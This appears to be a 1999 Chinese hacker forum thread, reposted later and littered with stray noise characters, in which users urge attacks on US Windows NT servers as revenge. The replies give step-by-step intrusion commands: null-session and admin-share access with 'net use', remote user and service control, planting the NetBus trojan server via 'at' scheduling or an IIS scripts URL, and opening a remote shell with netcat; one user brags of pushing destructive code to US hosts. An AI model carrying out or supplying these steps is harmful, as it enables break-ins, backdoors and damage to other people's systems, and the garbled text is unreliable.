《版主頁黑客工具和文章的幾個問題》中提到:4 L4 C2 R) e: m( Q; @
請教�,從版主頁上載得PINGER,GRINDER�����,LETMEIN等��,卻不能用�,PINGER安裝后�����,明明安裝前文件有1M多���,但安裝完后生成的文件夾中只有PINGER。EXE��,40多K�����,運行PINGER����,設(shè)置好IP,點PING��,彈出一個窗口(C++��。����。。)�,說出錯����,然后關(guān)閉了��,何故���,是不是安裝有誤����? 2�。運行LETMEIN,彈出以下錯誤:連接文件LETMEIN��。EXE到不存在的NETAPI32��。DLL����;NETGROUPGETUSERS�����。 是否說明需要NETAPI32�����。DLL文件,哪里有該DLL�����。 3����。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運行以下步驟等��,是否要求我的操作系統(tǒng)也是WINNT4��。0 ��,應(yīng)該不是吧����? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT����,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答,我花那么多的時間和金錢下載這幾M文件卻不能用�,實在窩囊哦, 強烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章��,以提高我國黑客水平��。
1 _. z5 W5 I% s5 e3 ]4 n& H> 我的機子MMX166�����,WIN98���,2��。5G���,32M內(nèi)存。! i: X# w d0 {
" o/ T' B+ p. e* S6 b5 V F- G' `9 s
黑客并不神秘�,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點�����,輔助相關(guān)的工具��,就可以成功�����。
7 |( M* b; s# C F" F, K A! \7 F6 U你的問題是�,pinger, grinder, letmein等工具必須要在NT上運行,我們強烈建議����,你一定要安裝NT,對于你的機器配制����,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存���,2G硬盤����。
0 _1 ?/ U* Y0 ?9 R( ?9 k1 \其實���,攻擊敵站����,利用其操作系統(tǒng)本身的工具就可以了,比如����,我們在NT上攻擊某服務(wù)器,該服務(wù)器為NT4.0���,我們將做如下簡單事情就有可能成功�����,假設(shè)目標(biāo)NT的IP地址為111.111.111.111����,做法如下:- t# o% @7 ]) a5 ?
net use \\111.111.111.111\ipc$ "" /user:""" Y) h9 q6 u: c3 U7 l- n
net.exe是NT的工具文件����,該命令將和目標(biāo)服務(wù)器建立Null Session,如果成功�,你可以查看該服務(wù)器上的共享目錄:: G) D5 R, D+ Z
net view \\111.111.111.111
( ^( {8 Y" m; A2 v ~$ `當(dāng)然,如果你有該NT管理員密碼��,就更好辦了�,假設(shè)其管理員Admin密碼為fuck:
* B! M9 G/ U) s. enet use \\111.111.111.111\ipc$ "fuck" /user:"Admin", m1 V" f3 r [+ R( ], L0 t" p4 z/ q
命令成功后,幾乎所有目標(biāo)NT上的配制�,資源�����,你都可以在你本地NT上連接遠(yuǎn)程計算機來查看或修改:
7 W, r6 ?; K9 |8 k/ C9 T3 ?1、查看或修改遠(yuǎn)程機器上的硬盤��,假如目標(biāo)NT上有C�、D兩個硬盤:" ~! ?$ G9 j& O- @% g3 V
net use x: \\111.111.111.111\c$$ ~" W% g8 x1 F+ u
net use y: \\111.111.111.111\d$
0 j: e4 u5 Y7 ]- ^) u* c0 r! p這樣,目標(biāo)NT上的C��、D盤分別被影射為你本地的X�����、Y盤�,你想怎么做都可以...
# g& e1 s2 S4 A) i+ K: Q2、管理目標(biāo)NT的用戶:
- o* z) y+ D }' G從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”6 B, q3 U# f/ @6 Y
鍵入\\111.111.111.111后���,目標(biāo)NT上的所有用戶你想怎么做都可以��,和管理你本地的一樣- G9 _0 |8 C9 w. W0 Z7 k
3�、管理目標(biāo)NT的服務(wù)* b2 U! ~* z% R3 y4 _; }( d6 o( n
選擇“管理工具(公用)”->“服務(wù)器管理”->“計算機”->“選擇域”* X9 A' _5 c, E
這樣你可以管理目標(biāo)NT上的服務(wù)��,共享目錄' }- W% }6 Q$ S+ p' w
4�、IIS管理5 ?6 A4 d$ s" U, U& x7 y
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
( q* E, f |! F目標(biāo)NT的FTP��、WWW服務(wù)你就可以重新配置
# z! `1 T7 k0 J. h: v3 o5�、事件管理
f' b$ @! M% m. {9 D( Q“事件查看器”->連接到服務(wù)器->111.111.111.111, U$ _# _/ d B5 t
: R9 h7 A- J+ ?9 E
還有更多的東西�����,都可以用NT本身的功能來完成���,這些都是95, 98所不能實現(xiàn)的��。
4 x( J" O8 w# \
C% z! |) f8 ]4 t: h, _: {8 y; ^- L當(dāng)然���,98,95也能做一些事情,但很麻煩���,比如:
$ Q2 f# C" `7 `net use \\111.111.111.111\ipc$
7 D" x g! ?; B% i; k* `net use z: \\111.111.111.111\d$
# ~4 N' w' z$ i7 w5 S但其后不能帶參數(shù)�,即改用其他用戶或密碼����,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼����,重新啟動95, 98����,改用該用戶和密碼登錄�,方可實現(xiàn)�,你可以連接目標(biāo)NT上的共享資源,但不能進行管理�����,如用戶����、事件等$ P# R4 [5 O, [& x$ ^4 [/ i- K# w
+ C! M' y& N8 F2 F4 @0 P: A' ]# m我們強烈建議各位有心要為死難者報仇,真正的想黑霉國的站點��,花點時間��,裝個NT吧�����,NT Workstation也可以����!8 M& ` K- t- U. b) D- m% K
這樣����,你還可以了解目標(biāo)機器上能有什么東東供你去用����!
; R4 J R" G( C6 D/ N* n. t/ L/ _ V+ c7 w/ J
3 \0 ~7 U R! @) T5 d1 Q+ i--------------------------------------------------------------------------------
% A; U7 m" X! X: C# }. r) s, I5 |
# v: q/ V b) P' u6 F% i/ X>quack于1999-06-12,23:37:44
G# V8 \- q& F1 j在大作《幾個有關(guān)黑的問題》中提到:) ]4 H9 T# _' {6 x O& ~ g
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!����。
: u" w5 T, z9 e6 N, j
6 }# }2 M! W! t$ i9 T% i$ k" Hkillusa于1999-06-13,03:25:153 E4 s" p% g7 B: t3 v: r) O
在大作《Re: 幾個有關(guān)黑的問題》中提到:* X! F9 V w1 L. }: L
q9 g, n3 D" ?5 U- Q# O
letmein.exe 暫時沒有mypwd參數(shù)�����,十分抱歉) G2 g) o( @' d9 U+ `
pinger程序�,只是利用ping來尋找主機,每臺NT服務(wù)器有一個主IP地址����,但也可以設(shè)置多個輔助IP地址,比如有些服務(wù)器供應(yīng)商��,一臺NT服務(wù)器上可以設(shè)置一千多個IP�����,每個IP對應(yīng)一個Hostname,而真正能找到主機名的只有一個IP地址,就是該主機的主IP地址����,所以有時顯示只有IP,而無主機名�����。另外��,有些服務(wù)器是非NT的操作系統(tǒng)����,有時將不會顯示主機名�。當(dāng)然,有時在服務(wù)器上進行一些設(shè)置�����,也會出現(xiàn)上面的情況�。0 x, F. B4 Y- k1 ]# V" } x9 ^
, a M1 ^" r5 G3 s5 {4 z) SNetbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序,所以��,netbus.exe是不用上傳的�����,只需在目的" s7 \ N3 t- \% c: h! u# v! K
服務(wù)器上運行ntsrv.exe,而在目的服務(wù)器運行該程序有很多種方法:" T H0 M: B1 `% Q/ m7 t, i; S
6 X4 V+ R% T; r7 X9 J2 v% z
1�、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運行某程序,具體使用方法����,可在自己的NT Dos窗口下鍵入以下:
6 Q) z# t+ G. @( A7 ?8 C# f7 O# w' g/ r& g
C:\>net start schedule
, U( p" I5 z4 ZSchedule 正在啟動服務(wù).....
) ^$ W% v, G5 G* _. ESchedulw 服務(wù)啟動成功。, a9 }' q0 U( K! \/ m
C:\>at /?0 T& u# g8 Q* X6 M1 Y' e
AT 命令排定在特定的日期和時間運行某些命令和程序���。: w) s2 C3 b- @4 \- p( r& a
運行 AT 命令之前必須先啟動 Schedule 服務(wù)��。
T% l! L& z2 i, i/ j
# s; {! d7 ]: b) o* x- q2 s. D& lAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
3 e( E6 s8 G! E* u, P) b8 ^AT [\\computername] time [/INTERACTIVE]( A; j% t; f! Q: s2 ]
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"5 o x7 w, @1 a' Z4 d8 z
7 k. M: p, [" V' d5 p) `
\\computername 指定遠(yuǎn)程計算機�����。 如果省略這個參數(shù)
. H1 P. k8 I' b) a( y! L- e命令會被排定在本機上運行����。7 s8 S; U; K, P! y
id 指定給排定進度命令的識別號��。7 H7 l: X, [+ u
3 ^. Z& S- Z, @6 h
/delete 刪除某個已排定進度的命令�。如果省略標(biāo)識,計算機上所有已排定進度的命令都會被刪除。8 _! O7 w9 ~' F. S( G
/yes 用于刪除所有作業(yè)�,且不想在運行刪除時顯示確認(rèn)信息 。
/ E& t! w9 x6 ?1 P! p4 O4 atime 指定命令運行的時間�。5 C }3 M* C( ]7 K/ Z, C; t6 ]7 ]
/interactive 允許作業(yè)在運行時,與用戶通過桌面交互�����。9 e, v, B+ r9 d9 }
) Y6 X* w P, X/ ?3 `) m( J/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令����。
& W. P/ z7 t1 `: D5 R5 R" w如果省略日期,則默認(rèn)為在每月的本日運行���。
+ l' j: q# h1 B4 [' ]+ D7 z$ ?, d0 N! a# Y
/next:date[,...] 指定在下一個指定日期 (如,下周三)����,運行命令。如果省略日期����,則默認(rèn)為在每月的本日運行。
) F7 W5 Q* `) m }$ D
7 r. J" b6 ?9 x"command" 準(zhǔn)備運行的 Windows NT 命令或批處理文件�����。
; _# d, d- W1 n! T6 r$ s. l) t& n2 m$ s9 L& [
C:\>! C' W$ ~, L% Q, _. d
* G! [4 N2 @. j2 _, `5 S6 Y知道了如何使用AT,再來看看如何在遠(yuǎn)程NT上運行ntsrv.exe:$ s& z# u+ v# B( P7 c
1 利用管理員登陸到目的服務(wù)器����,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
3 w; G& G/ c9 d4 y- d2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start6 c3 f5 r; r: e+ |
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運行,當(dāng)然最快運行最理想���,所以���,你可以用letmein.exe得到服務(wù)器的時間,然后:) v0 t* d+ r, ]1 v) H
at \\x.x.x.x 00:00 ntsrv.exe /port:64321$ y* e+ r4 f6 Z, l
其中00:00要改為用letmein.exe得回來的具體時間+一點容量��,等一會后��,再在本地啟動netbus.exe��,鍵入目的服務(wù)器得ip地址或hostname���,連接���!具體使用可參照 "How to get in nt",比如第一種方法����,你想要在目的服務(wù)器運行 LEGION���,可以利用netbus得上傳功能,將LEGION上傳至目的服務(wù)器�����,再用netbus的"Start program"���,鍵入完整路徑的LEGION運行程序�,就ok了���!第二種方法是利用netbus的“App redirect”功能�,啟動遠(yuǎn)程telnet服務(wù)��,如下:在netbus中擊“App redirect”�,鍵入"C:\>winnt\system32\cmd.exe"�,Port為:4321,服務(wù)就啟動了���,然后在本地運行:nc x.x.x.x 4321����,出現(xiàn)dos啟動的畫面就表示連接成功:- i5 B6 R$ e e- y7 Z
Microsoft(R) Windows NT(TM)
. J f, X3 T! i8 K# s# q(C) Copyright 1985-1996 Microsoft Corp.- j" H/ k: z. {+ V# a$ Y' L D
C:\>8 e6 N% U0 k" X' L
9 N; } T- L) L [. h2、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器
% }! E9 V# h; {4 `
, Q. e4 `6 O) p( [8 a將ntsrv.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄�����,如cgi-bin或scripts����,然后在瀏覽器鍵入url如:
! \: d& K7 D8 {$ |http://x.x.x.x/scripts/ntsrv.exe /port:643213 M" O& |# {) b' f3 K* m
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321" h2 i, M S7 \ n. v
該程序就啟動了$ g& Y8 v2 j% Q/ E! b3 _3 R0 j
) t- g& v$ P- P/ [8 w k我只提這幾中方法!. Y6 w! {; u# z) ?6 c: t
要成功�,必須打好基礎(chǔ)工,對操作系統(tǒng)充分了解!3 ?. O6 F+ K6 s9 B9 r
2 q; L( ]( H, o- F. q( I |
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡